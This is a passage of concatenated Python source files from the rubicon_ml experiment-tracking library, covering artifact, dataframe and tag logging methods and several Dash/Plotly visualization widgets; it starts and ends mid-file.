"""Raises a `RubiconException` if the data to log as
an artifact is improperly provided.
"""
if not any([data_bytes, data_file, data_object, data_path]):
raise RubiconException(
"One of `data_bytes`, `data_file`, `data_object` or `data_path` must be provided."
)
if name is None:
if data_path is not None:
name = os.path.basename(data_path)
else:
raise RubiconException("`name` must be provided if not using `data_path`.")
if data_bytes is None:
if data_object is not None:
data_bytes = pickle.dumps(data_object)
else:
if data_file is not None:
f = data_file
elif data_path is not None:
f = fsspec.open(data_path, "rb")
with f as open_file:
data_bytes = open_file.read()
return data_bytes, name
@failsafe
def log_artifact(
self,
data_bytes=None,
data_file=None,
data_object=None,
data_path=None,
name=None,
description=None,
tags=[],
):
"""Log an artifact to this client object.
Parameters
----------
data_bytes : bytes, optional
The raw bytes to log as an artifact.
data_file : TextIOWrapper, optional
The open file to log as an artifact.
data_object : python object, optional
The python object to log as an artifact.
data_path : str, optional
The absolute or relative local path or S3 path
to the data to log as an artifact. S3 paths
must be prepended with 's3://'.
name : str, optional
The name of the artifact file. Required if
`data_path` is not provided.
description : str, optional
A description of the artifact. Use to provide
additional context.
tags : list of str, optional
Values to tag the experiment with. Use tags to organize and
filter your artifacts.
Notes
-----
Only one of `data_bytes`, `data_file`, `data_object`, and `data_path`
should be provided. If more than one is given, the order
of precedence is `data_bytes`, `data_object`, `data_file`, `data_path`.
Returns
-------
rubicon.client.Artifact
The new artifact.
Examples
--------
>>> # Log with bytes
>>> experiment.log_artifact(
... data_bytes=b'hello rubicon!', name='bytes_artifact', description="log artifact from bytes"
... )
>>> # Log with file
>>> with open('some_relevant_file', 'rb') as f:
>>> project.log_artifact(
... data_file=f, name='file_artifact', description="log artifact from file"
... )
>>> # Log with file path
>>> experiment.log_artifact(
... data_path="./path/to/artifact.pkl", description="log artifact from file path"
... )
"""
if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
raise ValueError("`tags` must be `list` of type `str`")
data_bytes, name = self._validate_data(data_bytes, data_file, data_object, data_path, name)
artifact = domain.Artifact(
name=name,
description=description,
parent_id=self._domain.id,
tags=tags,
)
project_name, experiment_id = self._get_identifiers()
for repo in self.repositories:
repo.create_artifact(artifact, data_bytes, project_name, experiment_id=experiment_id)
return client.Artifact(artifact, self)
def _get_environment_bytes(self, export_cmd):
"""Get the working environment as a sequence of bytes.
Parameters
----------
export_cmd : list of str
The command to export the environment.
Returns
-------
bytes
A bytes sequence of the environment.
"""
try:
completed_process = subprocess.run(export_cmd, check=True, capture_output=True)
except subprocess.CalledProcessError as e:
raise RubiconException(e.stderr)
return completed_process.stdout
@failsafe
def log_conda_environment(self, artifact_name=None):
"""Log the conda environment as an artifact to this client object.
Useful for recreating your exact environment at a later date.
Parameters
----------
artifact_name : str, optional
The name of the artifact (the exported conda environment).
Returns
-------
rubicon.client.Artifact
The new artifact.
Notes
-----
Relies on running with an active conda environment.
"""
if artifact_name is None:
artifact_name = f"environment-{datetime.now().strftime('%Y_%m_%d-%I_%M_%S_%p')}.yml"
env_bytes = self._get_environment_bytes(["conda", "env", "export"])
artifact = self.log_artifact(data_bytes=env_bytes, name=artifact_name)
return artifact
@failsafe
def log_pip_requirements(self, artifact_name=None):
"""Log the pip requirements as an artifact to this client object.
Useful for recreating your exact environment at a later date.
Parameters
----------
artifact_name : str, optional
The name of the artifact (the exported pip environment).
Returns
-------
rubicon.client.Artifact
The new artifact.
"""
if artifact_name is None:
artifact_name = f"requirements-{datetime.now().strftime('%Y_%m_%d-%I_%M_%S_%p')}.txt"
requirements_bytes = self._get_environment_bytes(["pip", "freeze"])
artifact = self.log_artifact(data_bytes=requirements_bytes, name=artifact_name)
return artifact
@failsafe
def artifacts(self, name=None, tags=[], qtype="or"):
"""Get the artifacts logged to this client object.
Parameters
----------
name : str, optional
The name value to filter results on.
tags : list of str, optional
The tag values to filter results on.
qtype : str, optional
The query type to filter results on. Can be 'or' or
'and'. Defaults to 'or'.
Returns
-------
list of rubicon.client.Artifact
The artifacts previously logged to this client object.
"""
project_name, experiment_id = self._get_identifiers()
return_err = None
for repo in self.repositories:
try:
artifacts = [
client.Artifact(a, self)
for a in repo.get_artifacts_metadata(project_name, experiment_id=experiment_id)
]
except Exception as err:
return_err = err
else:
self._artifacts = filter_children(artifacts, tags, qtype, name)
return self._artifacts
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def artifact(self, name=None, id=None):
"""Get an artifact logged to this project by id or name.
Parameters
----------
id : str
The id of the artifact to get.
name : str
The name of the artifact to get.
Returns
-------
rubicon.client.Artifact
The artifact logged to this project with id `id` or name 'name'.
"""
if (name is None and id is None) or (name is not None and id is not None):
raise ValueError("`name` OR `id` required.")
if name is not None:
artifacts = self.artifacts(name=name)
if len(artifacts) == 0:
raise RubiconException(f"No artifact found with name '{name}'.")
if len(artifacts) > 1:
warnings.warn(
f"Multiple artifacts found with name '{name}'. Returning most recently logged."
)
artifact = artifacts[-1]
return artifact
else:
project_name, experiment_id = self._get_identifiers()
return_err = None
for repo in self.repositories:
try:
artifact = client.Artifact(
repo.get_artifact_metadata(project_name, id, experiment_id), self
)
except Exception as err:
return_err = err
else:
return artifact
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def delete_artifacts(self, ids):
"""Delete the artifacts logged to with client object
with ids `ids`.
Parameters
----------
ids : list of str
The ids of the artifacts to delete.
"""
project_name, experiment_id = self._get_identifiers()
for artifact_id in ids:
for repo in self.repositories:
repo.delete_artifact(project_name, artifact_id, experiment_id=experiment_id)
class DataframeMixin:
"""Adds dataframe support to a client object."""
@failsafe
def log_dataframe(self, df, description=None, name=None, tags=[]):
"""Log a dataframe to this client object.
Parameters
----------
df : pandas.DataFrame or dask.dataframe.DataFrame
The `dask` or `pandas` dataframe to log.
description : str, optional
The dataframe's description. Use to provide
additional context.
tags : list of str
The values to tag the dataframe with.
Returns
-------
rubicon.client.Dataframe
The new dataframe.
"""
if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
raise ValueError("`tags` must be `list` of type `str`")
dataframe = domain.Dataframe(
parent_id=self._domain.id,
description=description,
name=name,
tags=tags,
)
project_name, experiment_id = self._get_identifiers()
for repo in self.repositories:
repo.create_dataframe(dataframe, df, project_name, experiment_id=experiment_id)
return client.Dataframe(dataframe, self)
@failsafe
def dataframes(self, name=None, tags=[], qtype="or"):
"""Get the dataframes logged to this client object.
Parameters
----------
name : str, optional
The name value to filter results on.
tags : list of str, optional
The tag values to filter results on.
qtype : str, optional
The query type to filter results on. Can be 'or' or
'and'. Defaults to 'or'.
Returns
-------
list of rubicon.client.Dataframe
The dataframes previously logged to this client object.
"""
project_name, experiment_id = self._get_identifiers()
return_err = None
for repo in self.repositories:
try:
dataframes = [
client.Dataframe(d, self)
for d in repo.get_dataframes_metadata(project_name, experiment_id=experiment_id)
]
except Exception as err:
return_err = err
else:
self._dataframes = filter_children(dataframes, tags, qtype, name)
return self._dataframes
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def dataframe(self, name=None, id=None):
"""
Get the dataframe logged to this client object.
Parameters
----------
id : str
The id of the dataframe to get.
name : str
The name of the dataframe to get.
Returns
-------
rubicon.client.Dataframe
The dataframe logged to this project with id `id` or name 'name'.
"""
if (name is None and id is None) or (name is not None and id is not None):
raise ValueError("`name` OR `id` required.")
elif name is not None:
dataframes = self.dataframes(name=name)
if len(dataframes) == 0:
raise RubiconException(f"No dataframe found with name '{name}'.")
elif len(dataframes) > 1:
warnings.warn(
f"Multiple dataframes found with name '{name}'."
" Returning most recently logged."
)
dataframe = dataframes[-1]
return dataframe
else:
project_name, experiment_id = self._get_identifiers()
return_err = None
for repo in self.repositories:
try:
dataframe = client.Dataframe(
repo.get_dataframe_metadata(
project_name, experiment_id=experiment_id, dataframe_id=id
),
self,
)
except Exception as err:
return_err = err
else:
return dataframe
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def delete_dataframes(self, ids):
"""Delete the dataframes with ids `ids` logged to
this client object.
Parameters
----------
ids : list of str
The ids of the dataframes to delete.
"""
project_name, experiment_id = self._get_identifiers()
for dataframe_id in ids:
for repo in self.repositories:
repo.delete_dataframe(project_name, dataframe_id, experiment_id=experiment_id)
class TagMixin:
"""Adds tag support to a client object."""
def _get_taggable_identifiers(self):
project_name, experiment_id = self._parent._get_identifiers()
entity_identifier = None
# experiments do not return an entity identifier - they are the entity
if isinstance(self, client.Experiment):
experiment_id = self.id
# dataframes and artifacts are identified by their `id`s
elif isinstance(self, client.Dataframe) or isinstance(self, client.Artifact):
entity_identifier = self.id
# everything else is identified by its `name`
else:
entity_identifier = self.name
return project_name, experiment_id, entity_identifier
@failsafe
def add_tags(self, tags):
"""Add tags to this client object.
Parameters
----------
tags : list of str
The tag values to add.
"""
if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
raise ValueError("`tags` must be `list` of type `str`")
project_name, experiment_id, entity_identifier = self._get_taggable_identifiers()
self._domain.add_tags(tags)
for repo in self.repositories:
repo.add_tags(
project_name,
tags,
experiment_id=experiment_id,
entity_identifier=entity_identifier,
entity_type=self.__class__.__name__,
)
@failsafe
def remove_tags(self, tags):
"""Remove tags from this client object.
Parameters
----------
tags : list of str
The tag values to remove.
"""
project_name, experiment_id, entity_identifier = self._get_taggable_identifiers()
self._domain.remove_tags(tags)
for repo in self.repositories:
repo.remove_tags(
project_name,
tags,
experiment_id=experiment_id,
entity_identifier=entity_identifier,
entity_type=self.__class__.__name__,
)
def _update_tags(self, tag_data):
"""Add or remove the tags in `tag_data` based on
their key.
"""
for tag in tag_data:
self._domain.add_tags(tag.get("added_tags", []))
self._domain.remove_tags(tag.get("removed_tags", []))
@property
def tags(self):
"""Get this client object's tags."""
project_name, experiment_id, entity_identifier = self._get_taggable_identifiers()
return_err = None
for repo in self.repositories:
try:
tag_data = repo.get_tags(
project_name,
experiment_id=experiment_id,
entity_identifier=entity_identifier,
entity_type=self.__class__.__name__,
)
except Exception as err:
return_err = err
else:
self._update_tags(tag_data)
return self._domain.tags
raise RubiconException("all configured storage backends failed") from return_err | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/client/mixin.py | 0.817319 | 0.241889 | mixin.py | pypi |
import os
import pickle
import warnings
import fsspec
from rubicon_ml.client.base import Base
from rubicon_ml.client.mixin import TagMixin
from rubicon_ml.client.utils.exception_handling import failsafe
from rubicon_ml.exceptions import RubiconException
class Artifact(Base, TagMixin):
"""A client artifact.
An `artifact` is a catch-all for any other type of
data that can be logged to a file.
For example, a snapshot of a trained model (.pkl) can
be logged to the `experiment` created during its run.
Or, a base model for the model in development can be
logged to a `project` when leveraging transfer learning.
An `artifact` is logged to a `project` or an `experiment`.
Parameters
----------
domain : rubicon.domain.Artifact
The artifact domain model.
parent : rubicon.client.Project or rubicon.client.Experiment
The project or experiment that the artifact is
logged to.
"""
def __init__(self, domain, parent):
super().__init__(domain, parent._config)
self._data = None
self._parent = parent
def _get_data(self):
"""Loads the data associated with this artifact."""
project_name, experiment_id = self.parent._get_identifiers()
return_err = None
for repo in self.repositories:
self._data = None
try:
self._data = repo.get_artifact_data(
project_name, self.id, experiment_id=experiment_id
)
except Exception as err:
return_err = err
else:
return
if self._data is None:
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def get_data(self, unpickle=False):
"""Loads the data associated with this artifact and
unpickles if needed.
Parameters
----------
unpickle : bool, optional
Flag indicating whether artifact data must be
unpickled. Will be returned as bytes by default.
"""
project_name, experiment_id = self.parent._get_identifiers()
return_err = None
for repo in self.repositories:
try:
data = repo.get_artifact_data(project_name, self.id, experiment_id=experiment_id)
except Exception as err:
return_err = err
else:
if unpickle:
data = pickle.loads(data)
return data
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def download(self, location=None, name=None):
"""Download this artifact's data.
Parameters
----------
location : str, optional
The absolute or relative local directory or S3
bucket to download the artifact to. S3 buckets
must be prepended with 's3://'. Defaults to the
current local working directory.
name : str, optional
The name to give the downloaded artifact file.
Defaults to the artifact's given name when logged.
"""
if location is None:
location = os.getcwd()
if name is None:
name = self._domain.name
with fsspec.open(os.path.join(location, name), "wb", auto_mkdir=False) as f:
f.write(self.data)
@property
def id(self):
"""Get the artifact's id."""
return self._domain.id
@property
def name(self):
"""Get the artifact's name."""
return self._domain.name
@property
def description(self):
"""Get the artifact's description."""
return self._domain.description
@property
def created_at(self):
"""Get the time this dataframe was created."""
return self._domain.created_at
@property
def data(self):
"""Get the artifact's raw data."""
warnings.warn(
"`data` is deprecated, use `get_data()` instead",
DeprecationWarning,
)
if self._data is None:
self._get_data()
return self._data
@property
def parent(self):
"""Get the artifact's parent client object."""
return self._parent | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/client/artifact.py | 0.864625 | 0.19271 | artifact.py | pypi |
import dash_bootstrap_components as dbc
import pandas as pd
import plotly.express as px
from dash import dcc, html
from dash.dependencies import Input, Output
from rubicon_ml.viz.base import VizBase
from rubicon_ml.viz.common.colors import (
get_rubicon_colorscale,
light_blue,
plot_background_blue,
)
class DataframePlot(VizBase):
"""Plot the dataframes with name `dataframe_name` logged to the
experiments `experiments` on a shared axis.
Parameters
----------
dataframe_name : str
The name of the dataframe to plot. A dataframe with name
`dataframe_name` must be logged to each experiment in `experiments`.
experiments : list of rubicon_ml.client.experiment.Experiment, optional
The experiments to visualize. Defaults to None. Can be set as
attribute after instantiation.
plotting_func : function, optional
The `plotly.express` plotting function used to visualize the
dataframes. Available options can be found at
https://plotly.com/python-api-reference/plotly.express.html.
Defaults to `plotly.express.line`.
plotting_func_kwargs : dict, optional
Keyword arguments to be passed to `plotting_func`. Available options
can be found in the documentation of the individual functions at the
URL above.
x : str, optional
The name of the column in the dataframes with name `dataframe_name`
to plot across the x-axis.
y : str, optional
The name of the column in the dataframes with name `dataframe_name`
to plot across the y-axis.
"""
def __init__(
self,
dataframe_name,
experiments=None,
plotting_func=px.line,
plotting_func_kwargs={},
x=None,
y=None,
):
super().__init__(dash_title="plot dataframes")
self.dataframe_name = dataframe_name
self.experiments = experiments
self.plotting_func = plotting_func
self.plotting_func_kwargs = plotting_func_kwargs
self.x = x
self.y = y
@property
def layout(self):
"""Defines the dataframe plot's layout."""
header_text = (
f"showing dataframe '{self.dataframe_name}' "
f"over {len(self.experiments)} experiment"
f"{'s' if len(self.experiments) != 1 else ''}"
)
return html.Div(
[
html.Div(id="dummy-callback-trigger"),
dbc.Row(
html.H5(header_text, id="header-text"),
className="header-row",
),
dcc.Loading(dcc.Graph(id="dataframe-plot"), color=light_blue),
],
id="dataframe-plot-layout-container",
)
def load_experiment_data(self):
"""Load the experiment data required for the dataframe plot.
Extracts the dataframe with name `self.dataframe_name` from
each experiment in `self.experiment` and combines the data
stored in them into one dataframe. All dataframes with name
`dataframe_name` must have the same schema.
"""
self.data_df = None
for experiment in self.experiments:
dataframe = experiment.dataframe(name=self.dataframe_name)
data_df = dataframe.get_data()
data_df["experiment_id"] = experiment.id
if self.x is None:
self.x = data_df.columns[0]
if self.y is None:
self.y = data_df.columns[1]
if self.data_df is None:
self.data_df = data_df
else:
self.data_df = pd.concat([self.data_df, data_df])
self.data_df = self.data_df.reset_index(drop=True)
if "color" not in self.plotting_func_kwargs:
self.plotting_func_kwargs["color"] = "experiment_id"
if "color_discrete_sequence" not in self.plotting_func_kwargs:
self.plotting_func_kwargs["color_discrete_sequence"] = get_rubicon_colorscale(
len(self.experiments),
)
def register_callbacks(self, link_experiment_table=False):
outputs = [
Output("dataframe-plot", "figure"),
Output("header-text", "children"),
]
inputs = [Input("dummy-callback-trigger", "children")]
states = []
if link_experiment_table:
inputs.append(
Input("experiment-table", "derived_virtual_selected_row_ids"),
)
@self.app.callback(outputs, inputs, states)
def update_dataframe_plot(*args):
"""Render the plot specified by `self.plotting_func`.
Returns the Plotly figure generated by calling `self.plotting_func`
on the data in the experiments' dataframes and the header text
with the dataframes' name.
"""
if link_experiment_table:
selected_row_ids = args[-1]
selected_row_ids = selected_row_ids if selected_row_ids else []
else:
selected_row_ids = [e.id for e in self.experiments]
df_figure_margin = 30
df_figure = self.plotting_func(
self.data_df[self.data_df["experiment_id"].isin(selected_row_ids)],
self.x,
self.y,
**self.plotting_func_kwargs,
)
df_figure.update_layout(margin_t=df_figure_margin, plot_bgcolor=plot_background_blue)
for i in range(len(df_figure.data)):
df_figure.data[i].name = df_figure.data[i].name[:7]
header_text = (
f"showing dataframe '{self.dataframe_name}' "
f"over {len(selected_row_ids)} experiment"
f"{'s' if len(selected_row_ids) != 1 else ''}"
)
return df_figure, header_text | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/viz/dataframe_plot.py | 0.888124 | 0.549399 | dataframe_plot.py | pypi |
import json
import numpy as np
import plotly.graph_objects as go
from dash import callback_context, dcc, html
from dash.dependencies import ALL, Input, Output
from rubicon_ml.viz.base import VizBase
from rubicon_ml.viz.common import dropdown_header
from rubicon_ml.viz.common.colors import get_rubicon_colorscale, light_blue, transparent
class MetricCorrelationPlot(VizBase):
"""Visualize the correlation between the parameters and metrics logged
to the experiments `experiments` using a parallel coordinates plot.
More info on parallel coordinates plots can be found here:
https://plotly.com/python/parallel-coordinates-plot/
Parameters
----------
experiments : list of rubicon_ml.client.experiment.Experiment, optional
The experiments to visualize. Defaults to None. Can be set as
attribute after instantiation.
metric_names : list of str
The names of the metrics to load. Defaults to None, which loads all
metrics logged to the experiments `experiments`.
parameter_names : list of str
The names of the parameters to load. Defaults to None, which loads all
parameters logged to the experiments `experiments`.
selected_metric : str
The name of the metric to display at launch. Defaults to None, which
selects the metric loaded first.
"""
def __init__(
self,
experiments=None,
metric_names=None,
parameter_names=None,
selected_metric=None,
):
super().__init__(dash_title="plot metric correlation")
self.experiments = experiments
self.metric_names = metric_names
self.parameter_names = parameter_names
self.selected_metric = selected_metric
def _get_dimension(self, label, values):
"""Transforms the input data for use with Plotly's parallel
coordinates plot.
"""
if len(values) > 0 and any([isinstance(v, str) or isinstance(v, bool) for v in values]):
values = [str(v) for v in values]
unique_values, values = np.unique(values, return_inverse=True)
dimension = {
"label": label,
"ticktext": unique_values,
"tickvals": list(range(0, len(unique_values))),
"values": values,
}
else:
dimension = {
"label": label,
"values": values,
}
return dimension
@property
def layout(self):
"""Defines the layout for the metric correlation plot."""
return html.Div(
[
dropdown_header(
self.visible_metric_names,
self.selected_metric,
"comparing metric ",
f" over {len(self.experiments)} experiments",
"metric-correlation",
),
dcc.Loading(
html.Div(
dcc.Graph(
id="metric-correlation-plot",
),
id="metric-correlation-plot-container",
),
color=light_blue,
),
],
id="metric-correlation-plot-layout-container",
)
def load_experiment_data(self):
"""Load the experiment data required for the experiments table.
Extracts parameter and metric metadata from each experiment in
`self.experiments`. List metrics are ignored.
"""
self.experiment_records = {}
self.visible_metric_names = set()
self.visible_parameter_names = set()
for experiment in self.experiments:
experiment_record = {"metrics": {}, "parameters": {}}
for metric in experiment.metrics():
if (
self.metric_names is None or metric.name in self.metric_names
) and not isinstance(metric.value, list):
experiment_record["metrics"][metric.name] = metric.value
self.visible_metric_names.add(metric.name)
if self.selected_metric is None:
self.selected_metric = metric.name
for parameter in experiment.parameters():
if self.parameter_names is None or parameter.name in self.parameter_names:
experiment_record["parameters"][parameter.name] = parameter.value
self.visible_parameter_names.add(parameter.name)
self.experiment_records[experiment.id] = experiment_record
if self.selected_metric not in self.visible_metric_names:
raise ValueError(
f"no metric named `selected_metric` '{self.selected_metric}'"
" logged to any experiment in `experiments`."
)
self.visible_parameter_names = list(self.visible_parameter_names)
self.visible_metric_names = list(self.visible_metric_names)
self.visible_metric_names.sort()
def register_callbacks(self, link_experiment_table=False):
outputs = [
Output("metric-correlation-plot", "figure"),
Output("metric-correlation-dropdown", "label"),
Output("metric-correlation-header-right-text", "children"),
]
inputs = [
Input({"type": "metric-correlation-dropdown-button", "index": ALL}, "n_clicks"),
]
states = []
if link_experiment_table:
inputs.append(
Input("experiment-table", "derived_virtual_selected_row_ids"),
)
@self.app.callback(outputs, inputs, states)
def update_metric_plot(*args):
"""Render the correlation plot based on the currently selected metric.
Returns the Plotly `Parcoords` figure generated by the values of the
experiments' selected metric, the name of the currently selected
metric, and the header text with the metric's name.
"""
if link_experiment_table:
selected_row_ids = args[-1]
selected_row_ids = selected_row_ids if selected_row_ids else []
experiment_records = [
self.experiment_records[row_id] for row_id in selected_row_ids
]
else:
experiment_records = self.experiment_records.values()
property_id = callback_context.triggered[0].get("prop_id")
property_value = property_id[: property_id.index(".")]
if not property_value or property_value == "experiment-table":
selected_metric = self.selected_metric
else:
selected_metric = json.loads(property_value).get("index")
self.selected_metric = selected_metric
header_right_text = (
f"over {len(experiment_records)} experiment"
f"{'s' if len(experiment_records) != 1 else ''}"
)
parameter_values = {}
for parameter_name in self.visible_parameter_names:
parameter_values[parameter_name] = [
record["parameters"].get(parameter_name) for record in experiment_records
]
metric_values = [
record["metrics"].get(selected_metric) for record in experiment_records
]
plot_dimensions = []
for parameter_name, parameter_value in parameter_values.items():
if any([p is not None for p in parameter_value]):
plot_dimensions.append(self._get_dimension(parameter_name, parameter_value))
plot_dimensions.append(self._get_dimension(selected_metric, metric_values))
metric_correlation_plot = go.Figure(
go.Parcoords(
line={
"color": [m for m in metric_values if m is not None],
"colorscale": get_rubicon_colorscale(len(experiment_records)),
"showscale": True,
},
dimensions=plot_dimensions,
),
)
metric_correlation_plot.update_layout(paper_bgcolor=transparent)
return metric_correlation_plot, selected_metric, header_right_text | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/viz/metric_correlation_plot.py | 0.905321 | 0.41834 | metric_correlation_plot.py | pypi |
import dash_bootstrap_components as dbc
from dash import html
from rubicon_ml.viz.base import VizBase
COL_WIDTH_LOOKUP = {1: 12, 2: 6, 3: 4, 4: 3}
class Dashboard(VizBase):
"""Compose visualizations into a dashboard to view multiple widgets at once.
Parameters
----------
experiments : list of rubicon_ml.client.experiment.Experiment
The experiments to visualize.
widgets : list of lists of superclasses of rubicon_ml.viz.base.VizBase, optional
The widgets to compose in this dashboard. The widgets should be instantiated
without experiments prior to passing as an argument to `Dashboard`. Defaults
to a stacked layout of an ExperimentsTable and a MetricCorrelationPlot.
link_experiment_table : bool, optional
True to enable the callbacks that allow instances of `ExperimentsTable` to
update the experiment inputs of the other widgets in this dashboard. False
otherwise. Defaults to True.
"""
def __init__(self, experiments, widgets=None, link_experiment_table=True):
super().__init__(dash_title="dashboard")
self.experiments = experiments
self.link_experiment_table = link_experiment_table
if widgets is None:
from rubicon_ml.viz import ExperimentsTable, MetricCorrelationPlot
self.widgets = [
[ExperimentsTable(is_selectable=True)],
[MetricCorrelationPlot()],
]
else:
self.widgets = widgets
@property
def layout(self):
"""Defines the layout for the dashboard.
Compiles the figures in `self.widgets` based on their positions
in the given input list.
"""
dashboard_rows = []
for row in self.widgets:
width = COL_WIDTH_LOOKUP[len(row)]
row_widgets = []
for widget in row:
row_widgets.append(dbc.Col(widget.layout, width=width))
dashboard_rows.append(dbc.Row(row_widgets))
dashboard_container = html.Div(dashboard_rows)
return dashboard_container
def load_experiment_data(self):
"""Load the experiment data required for the dashboard.
Loads the experiment data for each widget in `self.widgets`.
"""
for row in self.widgets:
for widget in row:
widget.experiments = self.experiments
widget.load_experiment_data()
def register_callbacks(self):
for row in self.widgets:
for widget in row:
widget.app = self.app
widget.register_callbacks(self.link_experiment_table) | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/viz/dashboard.py | 0.845879 | 0.338993 | dashboard.py | pypi |
import os
import threading
import time
import dash_bootstrap_components as dbc
from dash import Dash, html
from rubicon_ml import __version__ as rubicon_ml_version
_next_available_port = 8050
class VizBase:
"""The base class for all `rubicon_ml` visualizations.
`VizBase` can not be directly instantatied. New widgets must all
extend `VizBase`.
"""
def __init__(
self,
dash_title="base",
):
self.dash_title = f"rubicon-ml: {dash_title}"
@property
def layout(self):
raise NotImplementedError("extensions of `VizBase` must implement property `layout(self)`")
def build_layout(self):
"""Wraps the layout defined by `self.layout` in a container providing
the `rubicon_ml` header.
"""
self.app.layout = dbc.Card(
dbc.CardBody(
[
dbc.Row(
[
html.Img(
id="rubicon-logo-img",
src=self.app.get_asset_url("images/rubicon-logo-dark.png"),
),
],
),
dbc.Row(html.P(rubicon_ml_version, id="version-text"), id="version-row"),
dbc.Row(self.layout),
],
id="frame",
),
)
def load_experiment_data(self):
raise NotImplementedError(
"extensions of `VizBase` must implement `load_experiment_data(self)`"
)
def register_callbacks(self, link_experiment_table=False):
raise NotImplementedError(
"extensions of `VizBase` must implement `register_callbacks(self)`"
)
def serve(self, in_background=False, dash_kwargs={}, run_server_kwargs={}):
"""Serve the Dash app on the next available port to render the visualization.
Parameters
----------
in_background : bool, optional
True to run the Dash app on a thread and return execution to the
interpreter. False to run the Dash app inline and block execution.
Defaults to False.
dash_kwargs : dict, optional
Keyword arguments to be passed along to the newly instantiated
Dash object. Available options can be found at
https://dash.plotly.com/reference#dash.dash.
run_server_kwargs : dict, optional
Keyword arguments to be passed along to `Dash.run_server`.
Available options can be found at
https://dash.plotly.com/reference#app.run_server. Most commonly,
the 'port' argument can be provided here to serve the app on a
specific port.
"""
if self.experiments is None:
raise RuntimeError(
f"`{self.__class__}.experiments` can not be None when `serve` is called"
)
self.app = Dash(
__name__,
external_stylesheets=[dbc.themes.LUX, dbc.icons.BOOTSTRAP],
title=self.dash_title,
**dash_kwargs,
)
self.load_experiment_data()
self.build_layout()
self.register_callbacks()
global _next_available_port
default_run_server_kwargs = {
"dev_tools_silence_routes_logging": True,
"port": _next_available_port,
}
default_run_server_kwargs.update(run_server_kwargs)
_next_available_port = default_run_server_kwargs["port"] + 1
if in_background:
running_server_thread = threading.Thread(
name="run_server",
target=self.app.run_server,
kwargs=default_run_server_kwargs,
)
running_server_thread.daemon = True
running_server_thread.start()
port = default_run_server_kwargs.get("port")
if "proxy" in run_server_kwargs:
host = default_run_server_kwargs.get("proxy").split("::")[-1]
else:
host = f"http://localhost:{port}"
time.sleep(0.1) # wait for thread to see if requested port is available
if not running_server_thread.is_alive():
raise RuntimeError(f"port {port} may already be in use")
return host
else:
self.app.run_server(**default_run_server_kwargs)
def show(self, i_frame_kwargs={}, dash_kwargs={}, run_server_kwargs={}):
"""Show the Dash app inline in a Jupyter notebook.
Parameters
----------
i_frame_kwargs : dict, optional
Keyword arguments to be passed along to the newly instantiated
IFrame object. Available options include 'height' and 'width'.
dash_kwargs : dict, optional
Keyword arguments to be passed along to the newly instantiated
Dash object. Available options can be found at
https://dash.plotly.com/reference#dash.dash.
run_server_kwargs : dict, optional
Keyword arguments to be passed along to `Dash.run_server`.
Available options can be found at
https://dash.plotly.com/reference#app.run_server. Most commonly,
the 'port' argument can be provided here to serve the app on a
specific port.
"""
from IPython.display import IFrame
host = self.serve(
in_background=True, dash_kwargs=dash_kwargs, run_server_kwargs=run_server_kwargs
)
proxied_host = os.path.join(host, self.app.config["requests_pathname_prefix"].lstrip("/"))
default_i_frame_kwargs = {
"height": "600px",
"width": "100%",
}
default_i_frame_kwargs.update(i_frame_kwargs)
return IFrame(proxied_host, **default_i_frame_kwargs) | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/viz/base.py | 0.744285 | 0.165998 | base.py | pypi |
import os
import dash_bootstrap_components as dbc
from dash import dash_table, dcc, html
from dash.dependencies import ALL, Input, Output, State
from rubicon_ml import publish
from rubicon_ml.viz.base import VizBase
from rubicon_ml.viz.common.colors import light_blue, plot_background_blue
class ExperimentsTable(VizBase):
"""Visualize the experiments `experiments` and their metadata, metrics,
and parameters in a tabular format.
Parameters
----------
experiments : list of rubicon_ml.client.experiment.Experiment, optional
The experiments to visualize. Defaults to None. Can be set as
attribute after instantiation.
is_selectable : bool, optional
True to enable selection of the rows in the table, False otherwise.
Defaults to True.
"""
def __init__(self, experiments=None, is_selectable=True):
super().__init__(dash_title="experiment table")
self.experiments = experiments
self.is_selectable = is_selectable
@property
def layout(self):
"""Defines the experiments table's layout."""
bulk_select_buttons = [
html.Div(
dbc.Button(
"select all experiments",
color="primary",
disabled=not self.is_selectable,
id="select-all-button",
outline=True,
),
className="bulk-select-button-container",
),
html.Div(
dbc.Button(
"clear all experiments",
color="primary",
disabled=not self.is_selectable,
id="clear-all-button",
outline=True,
),
className="bulk-select-button-container",
),
html.Div(
dbc.Button(
"publish selected",
color="primary",
disabled=not self.is_selectable,
id="publish-selected-button",
outline=True,
),
className="bulk-select-button-container",
),
]
experiment_table = dash_table.DataTable(
columns=[
{"name": column, "id": column, "selectable": self.is_selectable}
for column in self.all_columns
],
data=self.experiment_records,
filter_action="native",
fixed_columns={"headers": True, "data": 1},
hidden_columns=self.hidden_columns,
id="experiment-table",
page_size=10,
row_selectable="multi" if self.is_selectable else False,
selected_rows=[],
sort_action="native",
sort_mode="multi",
style_cell={"overflow": "hidden", "textOverflow": "ellipsis"},
style_data_conditional=[
{"if": {"row_index": "odd"}, "backgroundColor": plot_background_blue}
],
style_header={"fontWeight": 700},
style_table={"minWidth": "100%"},
)
header_text = (
f"showing {len(self.experiments)} experiments "
f"{'at commit ' if self.commit_hash is not None else ''}"
)
header = html.H5(
[
html.P(
header_text,
className="experiment-table-header-text",
style={"float": "left"} if self.commit_hash is not None else {},
),
html.A(
html.P(
[
self.commit_hash,
html.I(className="bi bi-box-arrow-up-right external-link-icon"),
]
),
href=self.github_url,
style={"display": "none"} if self.commit_hash is None else {},
target="_blank",
),
],
className="header-text",
)
toggle_columns_dropdown = dbc.DropdownMenu(
[
dbc.DropdownMenuItem(
"show all",
id="show-all-dropdown-button",
),
dbc.DropdownMenuItem(
"hide all",
id="hide-all-dropdown-button",
),
dbc.DropdownMenuItem(divider=True),
*[
dbc.DropdownMenuItem(
dcc.Checklist(
